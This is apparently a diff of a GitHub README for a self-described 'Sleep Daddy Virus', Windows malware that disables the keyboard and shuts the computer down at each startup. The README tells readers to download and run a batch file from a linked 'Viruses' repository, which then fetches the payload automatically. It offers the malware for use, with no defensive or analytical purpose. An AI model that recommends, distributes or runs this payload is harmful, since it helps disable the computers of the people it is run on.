INeddHelp/SleepDaddy-Virus/README.md

-#---Sleep Daddy Virus---
+---Sleep Daddy Virus---
 #
-#- What is it?
+- What is it?
 #
-#It's a virus that disconnects your keyboard and turns off your computer every time you turn it on.
+It's a virus that disconnects your keyboard and turns off your computer every time you turn it on.
 #
-#- Does it work on MacOs or Linux?
+- Does it work on MacOs or Linux?
 #
-#No, it only works on windows
+No, it only works on windows
 #
-#- How can i use this virus?
+- How can i use this virus?
 #
-#Download the file index.bat from https://github.com/INeddHelp/Viruses/tree/master/SleppDaddy and run it, it will automatically download the file i shared in this repository.
+Download the file index.bat from https://github.com/INeddHelp/Viruses/tree/master/SleppDaddy and run it, it will automatically download the file i shared in this repository.
 #
-#P.S.
+P.S.
 Check out my Viruses repository https://github.com/INeddHelp/Viruses